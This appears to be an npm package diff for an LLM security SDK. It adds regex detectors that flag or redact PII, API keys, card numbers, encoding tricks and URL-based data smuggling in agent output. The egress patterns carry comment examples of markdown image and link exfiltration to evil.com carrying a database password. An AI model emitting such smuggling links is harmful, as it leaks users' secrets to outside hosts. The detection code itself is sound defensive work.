C;CACF"}

package/dist/domain/pii/PIIPattern.d.ts

@@ -0,0 +1,41 @@
+/**
+ * PII Pattern
+ * Domain value object: immutable pattern definitions for Layer 1 outbound filtering.
+ *
+ * The SDK is a HIGH-PRECISION SENSOR. It does not guess the developer's intent.
+ * Every match is labeled SUSPICIOUS with a specific SuspiciousLabel.
+ * The developer decides the reaction: redact, block, or audit.
+ *
+ * The "Suspicious" Manifest:
+ * ┌──────────────────┬────────────────────────┬───────────────────────┐
+ * │ Trigger          │ Label                  │ Developer's Action    │
+ * ├──────────────────┼────────────────────────┼───────────────────────┤
+ * │ Email / Phone    │ SUSPICIOUS_PII         │ Usually Redact        │
+ * │ API / SSH Keys   │ SUSPICIOUS_SECRET      │ Usually Block         │
+ * │ External URL     │ SUSPICIOUS_EGRESS      │ Always Block          │
+ * │ ASCII / Unicode  │ SUSPICIOUS_ENCODING    │ Audit / Block         │
+ * └──────────────────┴────────────────────────┴───────────────────────┘
+ *
+ * All regex patterns carry the global flag so String.replace replaces every match.
+ */
+export type PIICategory = "email" | "phone" | "credit_card" | "ssn" | "api_key" | "ssh_private_key" | "egress_url_smuggling" | "egress_credential_url" | "egress_base64_url" | "encoding_zero_width" | "encoding_direction_override" | "encoding_base64_blob";
+/**
+ * Semantic label surfaced on every SuspiciousTrace.
+ * Maps directly to the "Suspicious Manifest" table — developer uses this to route decisions.
+ */
+export type SuspiciousLabel = "SUSPICIOUS_PII" | "SUSPICIOUS_SECRET" | "SUSPICIOUS_EGRESS" | "SUSPICIOUS_ENCODING";
+/** Maps each category to its semantic label */
+export declare const CATEGORY_TO_LABEL: Readonly<Record<PIICategory, SuspiciousLabel>>;
+/** Priority order for label escalation (highest wins when multiple labels fire) */
+export declare const LABEL_PRIORITY: Readonly<Record<SuspiciousLabel, number>>;
+export interface PIIPattern {
+    readonly id: string;
+    readonly name: string;
+    /** Must carry the global flag — String.replace relies on it */
+    readonly pattern: RegExp;
+    readonly category: PIICategory;
+    /** Token to substitute in the pre-computed redactedContent */
+    readonly redactAs: string;
+}
+export declare const PII_PATTERNS: readonly PIIPattern[];
+//# sourceMappingURL=PIIPattern.d.ts.map

package/dist/domain/pii/PIIPattern.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"PIIPattern.d.ts","sourceRoot":"","sources":["../../../src/domain/pii/PIIPattern.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;GAmBG;AAEH,MAAM,MAAM,WAAW,GACnB,OAAO,GACP,OAAO,GACP,aAAa,GACb,KAAK,GACL,SAAS,GACT,iBAAiB,GACjB,sBAAsB,GACtB,uBAAuB,GACvB,mBAAmB,GACnB,qBAAqB,GACrB,6BAA6B,GAC7B,sBAAsB,CAAC;AAE3B;;;GAGG;AACH,MAAM,MAAM,eAAe,GACvB,gBAAgB,GAChB,mBAAmB,GACnB,mBAAmB,GACnB,qBAAqB,CAAC;AAE1B,+CAA+C;AAC/C,eAAO,MAAM,iBAAiB,EAAE,QAAQ,CAAC,MAAM,CAAC,WAAW,EAAE,eAAe,CAAC,CAa5E,CAAC;AAEF,mFAAmF;AACnF,eAAO,MAAM,cAAc,EAAE,QAAQ,CAAC,MAAM,CAAC,eAAe,EAAE,MAAM,CAAC,CAKpE,CAAC;AAEF,MAAM,WAAW,UAAU;IACzB,QAAQ,CAAC,EAAE,EAAE,MAAM,CAAC;IACpB,QAAQ,CAAC,IAAI,EAAE,MAAM,CAAC;IACtB,+DAA+D;IAC/D,QAAQ,CAAC,OAAO,EAAE,MAAM,CAAC;IACzB,QAAQ,CAAC,QAAQ,EAAE,WAAW,CAAC;IAC/B,8DAA8D;IAC9D,QAAQ,CAAC,QAAQ,EAAE,MAAM,CAAC;CAC3B;AAuND,eAAO,MAAM,YAAY,EAAE,SAAS,UAAU,EAK7C,CAAC"}

package/dist/domain/pii/PIIPattern.js

@@ -0,0 +1,253 @@
+/**
+ * PII Pattern
+ * Domain value object: immutable pattern definitions for Layer 1 outbound filtering.
+ *
+ * The SDK is a HIGH-PRECISION SENSOR. It does not guess the developer's intent.
+ * Every match is labeled SUSPICIOUS with a specific SuspiciousLabel.
+ * The developer decides the reaction: redact, block, or audit.
+ *
+ * The "Suspicious" Manifest:
+ * ┌──────────────────┬────────────────────────┬───────────────────────┐
+ * │ Trigger          │ Label                  │ Developer's Action    │
+ * ├──────────────────┼────────────────────────┼───────────────────────┤
+ * │ Email / Phone    │ SUSPICIOUS_PII         │ Usually Redact        │
+ * │ API / SSH Keys   │ SUSPICIOUS_SECRET      │ Usually Block         │
+ * │ External URL     │ SUSPICIOUS_EGRESS      │ Always Block          │
+ * │ ASCII / Unicode  │ SUSPICIOUS_ENCODING    │ Audit / Block         │
+ * └──────────────────┴────────────────────────┴───────────────────────┘
+ *
+ * All regex patterns carry the global flag so String.replace replaces every match.
+ */
+/** Maps each category to its semantic label */
+export const CATEGORY_TO_LABEL = {
+    email: "SUSPICIOUS_PII",
+    phone: "SUSPICIOUS_PII",
+    credit_card: "SUSPICIOUS_SECRET",
+    ssn: "SUSPICIOUS_SECRET",
+    api_key: "SUSPICIOUS_SECRET",
+    ssh_private_key: "SUSPICIOUS_SECRET",
+    egress_url_smuggling: "SUSPICIOUS_EGRESS",
+    egress_credential_url: "SUSPICIOUS_EGRESS",
+    egress_base64_url: "SUSPICIOUS_EGRESS",
+    encoding_zero_width: "SUSPICIOUS_ENCODING",
+    encoding_direction_override: "SUSPICIOUS_ENCODING",
+    encoding_base64_blob: "SUSPICIOUS_ENCODING",
+};
+/** Priority order for label escalation (highest wins when multiple labels fire) */
+export const LABEL_PRIORITY = {
+    SUSPICIOUS_EGRESS: 3,
+    SUSPICIOUS_SECRET: 2,
+    SUSPICIOUS_ENCODING: 1,
+    SUSPICIOUS_PII: 0,
+};
+// ─── SUSPICIOUS_EGRESS ────────────────────────────────────────────────────────
+const EGRESS_PATTERNS = [
+    {
+        id: "pii-egress-001",
+        name: "Markdown Image with URL Query Params (Data Smuggling)",
+        // ![x](https://evil.com/log.png?config={"db_pass":"secret"})
+        pattern: /!\[[^\]]*\]\(https?:\/\/[^\s)]*\?[^\s)]+\)/gi,
+        category: "egress_url_smuggling",
+        redactAs: "[SUSPICIOUS_EGRESS:MARKDOWN_IMAGE_SMUGGLING]",
+    },
+    {
+        id: "pii-egress-002",
+        name: "Markdown Link with URL Query Params (Data Smuggling)",
+        // [click](https://evil.com?data=secret)
+        pattern: /(?<!!)\[[^\]]*\]\(https?:\/\/[^\s)]*\?[^\s)]+\)/gi,
+        category: "egress_url_smuggling",
+        redactAs: "[SUSPICIOUS_EGRESS:MARKDOWN_LINK_SMUGGLING]",
+    },
+    {
+        id: "pii-egress-003",
+        name: "Credential-Embedded URL",
+        // https://user:password@hostname
+        pattern: /https?:\/\/[A-Za-z0-9._%-]+:[A-Za-z0-9._~!$&'()*+,;=%-]+@[A-Za-z0-9.-]+/gi,
+        category: "egress_credential_url",
+        redactAs: "[SUSPICIOUS_EGRESS:CREDENTIAL_URL]",
+    },
+    {
+        id: "pii-egress-004",
+        name: "Base64 Blob in URL Parameter",
+        // ?param=<80+ base64 chars> — encodes data for exfiltration via tracking pixels
+        pattern: /[?&][A-Za-z0-9_%-]+=(?:[A-Za-z0-9+/]{80,}={0,2})/g,
+        category: "egress_base64_url",
+        redactAs: "[SUSPICIOUS_EGRESS:BASE64_URL_PAYLOAD]",
+    },
+];
+// ─── SUSPICIOUS_ENCODING ──────────────────────────────────────────────────────
+const ENCODING_PATTERNS = [
+    {
+        id: "pii-enc-001",
+        name: "Zero-Width Characters",
+        // Invisible Unicode used to watermark, fingerprint, or smuggle hidden data
+        pattern: /[\u200B\u200C\u200D\uFEFF\u2060]+/g,
+        category: "encoding_zero_width",
+        redactAs: "[SUSPICIOUS_ENCODING:ZERO_WIDTH_CHARS]",
+    },
+    {
+        id: "pii-enc-002",
+        name: "Unicode Bidirectional Override",
+        // LRE/RLE/PDF/LRO/RLO and newer isolate/pop chars — used to reverse text visually
+        pattern: /[\u202A-\u202E\u2066-\u2069]+/g,
+        category: "encoding_direction_override",
+        redactAs: "[SUSPICIOUS_ENCODING:BIDI_OVERRIDE]",
+    },
+    {
+        id: "pii-enc-003",
+        name: "Standalone Base64 Blob (≥120 chars)",
+        // A large base64 block outside of a URL — likely encoded payload or data exfil
+        pattern: /(?<![A-Za-z0-9+/])(?:[A-Za-z0-9+/]{4}){30,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?(?![A-Za-z0-9+/=])/g,
+        category: "encoding_base64_blob",
+        redactAs: "[SUSPICIOUS_ENCODING:BASE64_BLOB]",
+    },
+];
+// ─── SUSPICIOUS_SECRET ────────────────────────────────────────────────────────
+const SECRET_PATTERNS = [
+    {
+        id: "pii-ssh-001",
+        name: "SSH/PEM Private Key Block",
+        pattern: /-----BEGIN (?:RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----[\s\S]*?-----END (?:RSA |DSA |EC |OPENSSH )?PRIVATE KEY-----/gi,
+        category: "ssh_private_key",
+        redactAs: "[SUSPICIOUS_SECRET:SSH_PRIVATE_KEY]",
+    },
+    {
+        id: "pii-apikey-001",
+        name: "Anthropic API Key",
+        pattern: /sk-ant-api0[0-9]+-[A-Za-z0-9_-]{32,}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:ANTHROPIC_API_KEY]",
+    },
+    {
+        id: "pii-apikey-002",
+        name: "OpenAI API Key",
+        pattern: /sk-(?:proj-)?[A-Za-z0-9]{32,}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:OPENAI_API_KEY]",
+    },
+    {
+        id: "pii-apikey-003",
+        name: "Stripe Live Secret Key",
+        pattern: /sk_live_[A-Za-z0-9]{24,}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:STRIPE_SECRET_KEY]",
+    },
+    {
+        id: "pii-apikey-004",
+        name: "Stripe Live Restricted Key",
+        pattern: /rk_live_[A-Za-z0-9]{24,}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:STRIPE_RESTRICTED_KEY]",
+    },
+    {
+        id: "pii-apikey-005",
+        name: "GitHub Personal Access Token (classic)",
+        pattern: /ghp_[A-Za-z0-9]{36}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:GITHUB_TOKEN]",
+    },
+    {
+        id: "pii-apikey-006",
+        name: "GitHub Personal Access Token (fine-grained)",
+        pattern: /github_pat_[A-Za-z0-9_]{82}/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:GITHUB_TOKEN]",
+    },
+    {
+        id: "pii-apikey-007",
+        name: "AWS Access Key ID",
+        pattern: /\bAKIA[0-9A-Z]{16}\b/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:AWS_ACCESS_KEY]",
+    },
+    {
+        id: "pii-apikey-008",
+        name: "Google API Key",
+        pattern: /\bAIza[0-9A-Za-z_-]{35}\b/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:GOOGLE_API_KEY]",
+    },
+    {
+        id: "pii-apikey-009",
+        name: "Slack Token",
+        pattern: /\bxox[baprs]-[0-9A-Za-z-]{10,}\b/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:SLACK_TOKEN]",
+    },
+    {
+        id: "pii-apikey-010",
+        name: "SendGrid API Key",
+        pattern: /\bSG\.[A-Za-z0-9_-]{22}\.[A-Za-z0-9_-]{43}\b/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:SENDGRID_API_KEY]",
+    },
+    {
+        id: "pii-apikey-011",
+        name: "Twilio API Key",
+        pattern: /\bSK[0-9a-fA-F]{32}\b/g,
+        category: "api_key",
+        redactAs: "[SUSPICIOUS_SECRET:TWILIO_API_KEY]",
+    },
+    {
+        id: "pii-cc-001",
+        name: "Visa Card Number",
+        pattern: /\b4[0-9]{3}[- ]?[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}\b/g,
+        category: "credit_card",
+        redactAs: "[SUSPICIOUS_SECRET:CREDIT_CARD]",
+    },
+    {
+        id: "pii-cc-002",
+        name: "Mastercard Number",
+        pattern: /\b(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[- ]?[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}\b/g,
+        category: "credit_card",
+        redactAs: "[SUSPICIOUS_SECRET:CREDIT_CARD]",
+    },
+    {
+        id: "pii-cc-003",
+        name: "Amex Card Number",
+        pattern: /\b3[47][0-9]{2}[- ]?[0-9]{6}[- ]?[0-9]{5}\b/g,
+        category: "credit_card",
+        redactAs: "[SUSPICIOUS_SECRET:CREDIT_CARD]",
+    },
+    {
+        id: "pii-cc-004",
+        name: "Discover Card Number",
+        pattern: /\b6(?:011|5[0-9]{2})[- ]?[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}\b/g,
+        category: "credit_card",
+        redactAs: "[SUSPICIOUS_SECRET:CREDIT_CARD]",
+    },
+    {
+        id: "pii-ssn-001",
+        name: "US Social Security Number",
+        pattern: /(?<!\d)\d{3}-\d{2}-\d{4}(?!\d)/g,
+        category: "ssn",
+        redactAs: "[SUSPICIOUS_SECRET:SSN]",
+    },
+];
+// ─── SUSPICIOUS_PII ───────────────────────────────────────────────────────────
+const PII_PATTERNS_LOW = [
+    {
+        id: "pii-email-001",
+        name: "Email Address",
+        pattern: /\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b/g,
+        category: "email",
+        redactAs: "[SUSPICIOUS_PII:EMAIL]",
+    },
+    {
+        id: "pii-phone-001",
+        name: "US Phone Number",
+        pattern: /(?<!\d)(?:\+1[-.\s]?)?\(?[2-9][0-9]{2}\)?[-.\s][0-9]{3}[-.\s][0-9]{4}(?!\d)/g,
+        category: "phone",
+        redactAs: "[SUSPICIOUS_PII:PHONE]",
+    },
+];
+// ─── Canonical ordered set ────────────────────────────────────────────────────
+// Scan order: EGRESS → ENCODING → SECRET → PII
+// Highest-severity patterns first so the label reflects the worst finding.
+export const PII_PATTERNS = [
+    ...EGRESS_PATTERNS,
+    ...ENCODING_PATTERNS,
+    ...SECRET_PATTERNS,
+    ...PII_PATTERNS_LOW,
+];
+//# sourceMappingURL=PIIPattern.js.map

package/dist/domain/pii/PIIPattern.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"PIIPattern.js","sourceRoot":"","sources":["../../../src/domain/pii/PIIPattern.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;GAmBG;AA0BH,+CAA+C;AAC/C,MAAM,CAAC,MAAM,iBAAiB,GAAmD;IAC/E,KAAK,EAAuB,gBAAgB;IAC5C,KAAK,EAAuB,gBAAgB;IAC5C,WAAW,EAAiB,mBAAmB;IAC/C,GAAG,EAAyB,mBAAmB;IAC/C,OAAO,EAAqB,mBAAmB;IAC/C,eAAe,EAAa,mBAAmB;IAC/C,oBAAoB,EAAQ,mBAAmB;IAC/C,qBAAqB,EAAO,mBAAmB;IAC/C,iBAAiB,EAAW,mBAAmB;IAC/C,mBAAmB,EAAS,qBAAqB;IACjD,2BAA2B,EAAC,qBAAqB;IACjD,oBAAoB,EAAQ,qBAAqB;CAClD,CAAC;AAEF,mFAAmF;AACnF,MAAM,CAAC,MAAM,cAAc,GAA8C;IACvE,iBAAiB,EAAI,CAAC;IACtB,iBAAiB,EAAI,CAAC;IACtB,mBAAmB,EAAE,CAAC;IACtB,cAAc,EAAO,CAAC;CACvB,CAAC;AAYF,iFAAiF;AAEjF,MAAM,eAAe,GAA0B;IAC7C;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,uDAAuD;QAC7D,6DAA6D;QAC7D,OAAO,EAAE,8CAA8C;QACvD,QAAQ,EAAE,sBAAsB;QAChC,QAAQ,EAAE,8CAA8C;KACzD;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,sDAAsD;QAC5D,wCAAwC;QACxC,OAAO,EAAE,mDAAmD;QAC5D,QAAQ,EAAE,sBAAsB;QAChC,QAAQ,EAAE,6CAA6C;KACxD;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,yBAAyB;QAC/B,iCAAiC;QACjC,OAAO,EAAE,2EAA2E;QACpF,QAAQ,EAAE,uBAAuB;QACjC,QAAQ,EAAE,oCAAoC;KAC/C;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,8BAA8B;QACpC,gFAAgF;QAChF,OAAO,EAAE,mDAAmD;QAC5D,QAAQ,EAAE,mBAAmB;QAC7B,QAAQ,EAAE,wCAAwC;KACnD;CACF,CAAC;AAEF,iFAAiF;AAEjF,MAAM,iBAAiB,GAA0B;IAC/C;QACE,EAAE,EAAE,aAAa;QACjB,IAAI,EAAE,uBAAuB;QAC7B,2EAA2E;QAC3E,OAAO,EAAE,oCAAoC;QAC7C,QAAQ,EAAE,qBAAqB;QAC/B,QAAQ,EAAE,wCAAwC;KACnD;IACD;QACE,EAAE,EAAE,aAAa;QACjB,IAAI,EAAE,gCAAgC;QACtC,kFAAkF;QAClF,OAAO,EAAE,gCAAgC;QACzC,QAAQ,EAAE,6BAA6B;QACvC,QAAQ,EAAE,qCAAqC;KAChD;IACD;QACE,EAAE,EAAE,aAAa;QACjB,IAAI,EAAE,qCAAqC;QAC3C,+EAA+E;QAC/E,OAAO,EAAE,yGAAyG;QAClH,QAAQ,EAAE,sBAAsB;QAChC,QAAQ,EAAE,mCAAmC;KAC9C;CACF,CAAC;AAEF,iFAAiF;AAEjF,MAAM,eAAe,GAA0B;IAC7C;QACE,EAAE,EAAE,aAAa;QACjB,IAAI,EAAE,2BAA2B;QACjC,OAAO,EAAE,sHAAsH;QAC/H,QAAQ,EAAE,iBAAiB;QAC3B,QAAQ,EAAE,qCAAqC;KAChD;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,mBAAmB;QACzB,OAAO,EAAE,uCAAuC;QAChD,QAAQ,EAAE,SAAS;QACnB,QAAQ,EAAE,uCAAuC;KAClD;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,gBAAgB;QACtB,OAAO,EAAE,gCAAgC;QACzC,QAAQ,EAAE,SAAS;QACnB,QAAQ,EAAE,oCAAoC;KAC/C;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,wBAAwB;QAC9B,OAAO,EAAE,2BAA2B;QACpC,QAAQ,EAAE,SAAS;QACnB,QAAQ,EAAE,uCAAuC;KAClD;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,4BAA4B;QAClC,OAAO,EAAE,2BAA2B;QACpC,QAAQ,EAAE,SAAS;QACnB,QAAQ,EAAE,2CAA2C;KACtD;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,wCAAwC;QAC9C,OAAO,EAAE,sBAAsB;QAC/B,QAAQ,EAAE,SAAS;QACnB,QAAQ,EAAE,kCAAkC;KAC7C;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,6CAA6C;QACnD,OAAO,EAAE,8BAA8B;QACvC,QAAQ,EAAE,SAAS;QACnB,QAAQ,EAAE,kCAAkC;KAC7C;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,mBAAmB;QACzB,OAAO,EAAE,uBAAuB;QAChC,QAAQ,EAAE,SAAS;QACnB,QAAQ,EAAE,oCAAoC;KAC/C;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,gBAAgB;QACtB,OAAO,EAAE,4BAA4B;QACrC,QAAQ,EAAE,SAAS;QACnB,QAAQ,EAAE,oCAAoC;KAC/C;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,aAAa;QACnB,OAAO,EAAE,mCAAmC;QAC5C,QAAQ,EAAE,SAAS;QACnB,QAAQ,EAAE,iCAAiC;KAC5C;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,kBAAkB;QACxB,OAAO,EAAE,+CAA+C;QACxD,QAAQ,EAAE,SAAS;QACnB,QAAQ,EAAE,sCAAsC;KACjD;IACD;QACE,EAAE,EAAE,gBAAgB;QACpB,IAAI,EAAE,gBAAgB;QACtB,OAAO,EAAE,wBAAwB;QACjC,QAAQ,EAAE,SAAS;QACnB,QAAQ,EAAE,oCAAoC;KAC/C;IACD;QACE,EAAE,EAAE,YAAY;QAChB,IAAI,EAAE,kBAAkB;QACxB,OAAO,EAAE,uDAAuD;QAChE,QAAQ,EAAE,aAAa;QACvB,QAAQ,EAAE,iCAAiC;KAC5C;IACD;QACE,EAAE,EAAE,YAAY;QAChB,IAAI,EAAE,mBAAmB;QACzB,OAAO,EAAE,sHAAsH;QAC/H,QAAQ,EAAE,aAAa;QACvB,QAAQ,EAAE,iCAAiC;KAC5C;IACD;QACE,EAAE,EAAE,YAAY;QAChB,IAAI,EAAE,kBAAkB;QACxB,OAAO,EAAE,8CAA8C;QACvD,QAAQ,EAAE,aAAa;QACvB,QAAQ,EAAE,iCAAiC;KAC5C;IACD;QACE,EAAE,EAAE,YAAY;QAChB,IAAI,EAAE,sBAAsB;QAC5B,OAAO,EAAE,gEAAgE;QACzE,QAAQ,EAAE,aAAa;QACvB,QAAQ,EAAE,iCAAiC;KAC5C;IACD;QACE,EAAE,EAAE,aAAa;QACjB,IAAI,EAAE,2BAA2B;QACjC,OAAO,EAAE,iCAAiC;QAC1C,QAAQ,EAAE,KAAK;QACf,QAAQ,EAAE,yBAAyB;KACpC;CACF,CAAC;AAEF,iFAAiF;AAEjF,MAAM,gBAAgB,GAA0B;IAC9C;QACE,EAAE,EAAE,eAAe;QACnB,IAAI,EAAE,eAAe;QACrB,OAAO,EAAE,qDAAqD;QAC9D,QAAQ,EAAE,OAAO;QACjB,QAAQ,EAAE,wBAAwB;KACnC;IACD;QACE,EAAE,EAAE,eAAe;QACnB,IAAI,EAAE,iBAAiB;QACvB,OAAO,EAAE,8EAA8E;QACvF,QAAQ,EAAE,OAAO;QACjB,QAAQ,EAAE,wBAAwB;KACnC;CACF,CAAC;AAEF,iFAAiF;AACjF,+CAA+C;AAC/C,2EAA2E;AAE3E,MAAM,CAAC,MAAM,YAAY,GAA0B;IACjD,GAAG,eAAe;IAClB,GAAG,iBAAiB;IACpB,GAAG,eAAe;IAClB,GAAG,gBAAgB;CACpB,CAAC"}

package/dist/domain/pii/index.d.ts

@@ -0,0 +1,9 @@
+/**
+ * Domain / PII
+ * Barrel export for Layer 1 Deterministic Filter
+ */
+export { DeterministicFilter } from "./DeterministicFilter";
+export type { SuspiciousTrace, PIIFinding, FilterOutcome, SuspiciousLabel } from "./DeterministicFilter";
+export { PII_PATTERNS, CATEGORY_TO_LABEL, LABEL_PRIORITY } from "./PIIPattern";
+export type { PIIPattern, PIICategory } from "./PIIPattern";
+//# sourceMappingURL=index.d.ts.map

package/dist/domain/pii/index.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../../../src/domain/pii/index.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH,OAAO,EAAE,mBAAmB,EAAE,MAAM,uBAAuB,CAAC;AAC5D,YAAY,EAAE,eAAe,EAAE,UAAU,EAAE,aAAa,EAAE,eAAe,EAAE,MAAM,uBAAuB,CAAC;AAEzG,OAAO,EAAE,YAAY,EAAE,iBAAiB,EAAE,cAAc,EAAE,MAAM,cAAc,CAAC;AAC/E,YAAY,EAAE,UAAU,EAAE,WAAW,EAAE,MAAM,cAAc,CAAC"}

package/dist/domain/pii/index.js

@@ -0,0 +1,7 @@
+/**
+ * Domain / PII
+ * Barrel export for Layer 1 Deterministic Filter
+ */
+export { DeterministicFilter } from './DeterministicFilter.js';
+export { PII_PATTERNS, CATEGORY_TO_LABEL, LABEL_PRIORITY } from './PIIPattern.js';
+//# sourceMappingURL=index.js.map

package/dist/domain/pii/index.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"index.js","sourceRoot":"","sources":["../../../src/domain/pii/index.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH,OAAO,EAAE,mBAAmB,EAAE,MAAM,uBAAuB,CAAC;AAG5D,OAAO,EAAE,YAAY,EAAE,iBAAiB,EAAE,cAAc,EAAE,MAAM,cAAc,CAAC"}

package/dist/index.d.ts

@@ -17,6 +17,7 @@
  * ```
  */
 import { type WrapOptions, type ServiceStatus, type ScanResult } from "./application";
+import { type SuspiciousTrace } from "./domain/pii/DeterministicFilter";
 import { ShieldBlockError } from "./application/ShieldBlockError";
 import { type LLMResponse } from "./application/ports/ILLMProvider";
 /**
@@ -134,6 +135,39 @@ export declare class Tracerney {
      * ```
      */
     scanPrompt(prompt: string): Promise<ScanResult>;
+    /**
+     * Layer 1: Scan any string (agent output, tool result, raw text) for suspicious content.
+     *
+     * The SDK is a high-precision sensor — it never decides for you.
+     * Every match is returned as a SuspiciousTrace with a label and pre-computed redactedContent.
+     * You choose the reaction.
+     *
+     * **The Suspicious Manifest:**
+     * | Label                  | Trigger              | Recommended Action |
+     * |------------------------|----------------------|--------------------|
+     * | `SUSPICIOUS_PII`       | Email / Phone        | Usually Redact     |
+     * | `SUSPICIOUS_SECRET`    | API keys / SSH       | Usually Block      |
+     * | `SUSPICIOUS_EGRESS`    | External URL smuggle | Always Block       |
+     * | `SUSPICIOUS_ENCODING`  | Zero-width / BiDi    | Audit / Block      |
+     *
+     * @example
+     * ```typescript
+     * const trace = tracerney.validate(agentOutput);
+     *
+     * if (trace.isSuspicious) {
+     *   console.log(`Alert [${trace.label}]: ${trace.reason}`);
+     *
+     *   // Option A: Hard block
+     *   if (trace.label === 'SUSPICIOUS_EGRESS') {
+     *     throw new Error('Security Policy Violation');
+     *   }
+     *
+     *   // Option B: Surgical scrub
+     *   return trace.redactedContent;
+     * }
+     * ```
+     */
+    validate(text: string): SuspiciousTrace;
     /**
      * Update allowed tools at runtime
      *
@@ -161,6 +195,10 @@ export type { RemotePatternRepositoryConfig } from "./infrastructure/patterns";
 export { normalizePrompt, normalizePrompts, jitter } from "./application/utils";
 export { HttpSignalSink } from "./infrastructure/telemetry";
 export type { HttpSignalSinkConfig } from "./infrastructure/telemetry";
+export { DeterministicFilter } from "./domain/pii/DeterministicFilter";
+export type { SuspiciousTrace, FilterOutcome, PIIFinding, SuspiciousLabel } from "./domain/pii/DeterministicFilter";
+export { PII_PATTERNS } from "./domain/pii/PIIPattern";
+export type { PIIPattern, PIICategory } from "./domain/pii/PIIPattern";
 export { LLMSentinel } from "./infrastructure/sentinel/LLMSentinel";
 export type { LLMSentinelOptions } from "./infrastructure/sentinel/LLMSentinel";
 export { HttpShadowLogSink } from "./infrastructure/telemetry/HttpShadowLogSink";

package/dist/index.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../src/index.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;GAiBG;AAEH,OAAO,EAA4B,KAAK,WAAW,EAAE,KAAK,aAAa,EAAE,KAAK,UAAU,EAAE,MAAM,eAAe,CAAC;AAChH,OAAO,EAAE,gBAAgB,EAAE,MAAM,gCAAgC,CAAC;AAElE,OAAO,EAAE,KAAK,WAAW,EAAE,MAAM,kCAAkC,CAAC;AAMpE;;GAEG;AACH,MAAM,WAAW,gBAAgB;IAC/B;;OAEG;IACH,YAAY,CAAC,EAAE,MAAM,EAAE,CAAC;IAExB;;;;;;;;;;;OAWG;IACH,OAAO,CAAC,EAAE,MAAM,CAAC;IAEjB;;;;OAIG;IACH,WAAW,CAAC,EAAE,MAAM,CAAC;IAErB;;OAEG;IACH,MAAM,CAAC,EAAE,MAAM,CAAC;IAEhB;;;OAGG;IACH,WAAW,CAAC,EAAE,MAAM,CAAC;IAErB;;OAEG;IACH,eAAe,CAAC,EAAE,OAAO,CAAC;IAE1B;;OAEG;IACH,iBAAiB,CAAC,EAAE,MAAM,CAAC;IAE3B;;;;OAIG;IACH,gBAAgB,CAAC,EAAE,MAAM,CAAC;IAE1B;;;OAGG;IACH,iBAAiB,CAAC,EAAE,MAAM,CAAC;IAE3B;;OAEG;IACH,eAAe,CAAC,EAAE,OAAO,CAAC;CAC3B;AAED;;;;GAIG;AACH,qBAAa,SAAS;IACpB,OAAO,CAAC,OAAO,CAA2B;IAE1C;;OAEG;gBACS,OAAO,GAAE,gBAAqB;IAiD1C;;;;OAIG;IACH,OAAO,CAAC,gBAAgB;IAgBxB;;;;;;;;;;;;;;;;;OAiBG;IACG,IAAI,CAAC,CAAC,SAAS,WAAW,EAC9B,OAAO,EAAE,MAAM,OAAO,CAAC,CAAC,CAAC,EACzB,OAAO,CAAC,EAAE,WAAW,GACpB,OAAO,CAAC,CAAC,CAAC;IAIb;;;;;;;;;;;;;;;;;OAiBG;IACG,UAAU,CAAC,MAAM,EAAE,MAAM,GAAG,OAAO,CAAC,UAAU,CAAC;IAIrD;;;;OAIG;IACH,eAAe,CAAC,KAAK,EAAE,MAAM,EAAE,GAAG,IAAI;IAItC;;OAEG;IACH,SAAS,IAAI,aAAa;IAI1B;;;OAGG;IACH,OAAO,IAAI,IAAI;CAGhB;AAOD,OAAO,EAAE,gBAAgB,EAAE,CAAC;AAG5B,YAAY,EAAE,WAAW,EAAE,aAAa,EAAE,WAAW,EAAE,CAAC;AAGxD,YAAY,EACV,eAAe,EACf,eAAe,EACf,eAAe,GAChB,MAAM,oBAAoB,CAAC;AAE5B,YAAY,EAAE,UAAU,EAAE,aAAa,EAAE,MAAM,gBAAgB